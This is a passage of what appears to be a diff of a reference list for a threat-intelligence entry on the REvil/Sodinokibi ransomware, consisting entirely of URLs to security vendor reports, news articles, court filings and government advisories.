"https://www.secureworks.com/research/lv-ransomware", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", - "https://twitter.com/fwosar/status/1420119812815138824", - "https://hatching.io/blog/ransomware-part2", - "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", - "https://vimeo.com/449849549", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", - "https://redcanary.com/blog/uncompromised-kaseya/", - "https://twitter.com/R3MRUM/status/1412064882623713283", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://blog.group-ib.com/REvil_RaaS", - "https://twitter.com/LloydLabs/status/1411098844209819648", - "https://twitter.com/SophosLabs/status/1412056467201462276", - "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", - "https://velzart.nl/blog/ransomeware/", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", - "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", - "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt", - "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", - "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", - "https://community.riskiq.com/article/3315064b", - "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", - "https://threatintel.blog/OPBlueRaven-Part1/", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", - "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/", + "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas", + "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", + "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", + "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent", + "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", + "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", + "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "https://www.bbc.com/news/technology-59297187", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", + "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", "https://twitter.com/resecurity_com/status/1412662343796813827", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", - "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", - "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www.youtube.com/watch?v=QYQQUUpU04s", - "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", - "https://www.certego.net/en/news/malware-tales-sodinokibi/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", - "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", - "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", - "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/", - "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", - "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://www.secureworks.com/research/revil-sodinokibi-ransomware", - "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", - "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", - "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", - "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", - "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", - "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", - "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", + "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", + "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", - "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", + "https://blog.group-ib.com/REvil_RaaS", + "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles", + "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view", + "https://twitter.com/VK_Intel/status/1411066870350942213", + "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + "https://www.kpn.com/security-blogs/Tracking-REvil.htm", "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", + "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", + "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "https://twitter.com/svch0st/status/1411537562380816384", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", + "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", + "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", + "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", + "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html", + "https://twitter.com/_alex_il_/status/1412403420217159694", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.connectwise.com/resources/revil-profile", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://threatpost.com/ransomware-revil-sites-disappears/167745/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://blog.amossys.fr/sodinokibi-malware-analysis.html", + "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", + "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", + "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", + "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", + "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", + "https://twitter.com/SophosLabs/status/1412056467201462276", + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", + "https://community.riskiq.com/article/3315064b", + "https://twitter.com/fwosar/status/1411281334870368260", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.netskope.com/blog/netskope-threat-coverage-revil", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://securelist.com/ransomware-world-in-2021/102169/", + "https://twitter.com/LloydLabs/status/1411098844209819648", + "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", + "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/", + "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/", + "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://asec.ahnlab.com/ko/19860/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.grahamcluley.com/travelex-paid-ransom/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/", "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/", + "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", + "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf", + "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/", + "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/", + "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", + "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", + "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", + "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", + "https://www.certego.net/en/news/malware-tales-sodinokibi/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html", + "https://twitter.com/Jacob_Pimental/status/1391055792774729728", + "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", + "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", "https://ke-la.com/will-the-revils-story-finally-be-over/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/", + "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/", + "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", + "https://twitter.com/VK_Intel/status/1374571480370061312?s=20", + "https://www.kaseya.com/potential-attack-on-kaseya-vsa/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/", + "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", + "https://twitter.com/R3MRUM/status/1412064882623713283", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", - "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", + "https://www.flashpoint-intel.com/blog/revil-disappears-again/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://twitter.com/SyscallE/status/1411074271875670022", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", + "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/", + "https://www.secureworks.com/research/lv-ransomware", + "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "http://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://velzart.nl/blog/ransomeware/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://www.youtube.com/watch?v=P8o6GItci5w", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://home.treasury.gov/news/press-releases/jy0471", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", + "https://redcanary.com/blog/uncompromised-kaseya/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", + "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", "https://securelist.com/sodin-ransomware/91473/", - "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", - "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", - "https://asec.ahnlab.com/ko/19860/", - "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + 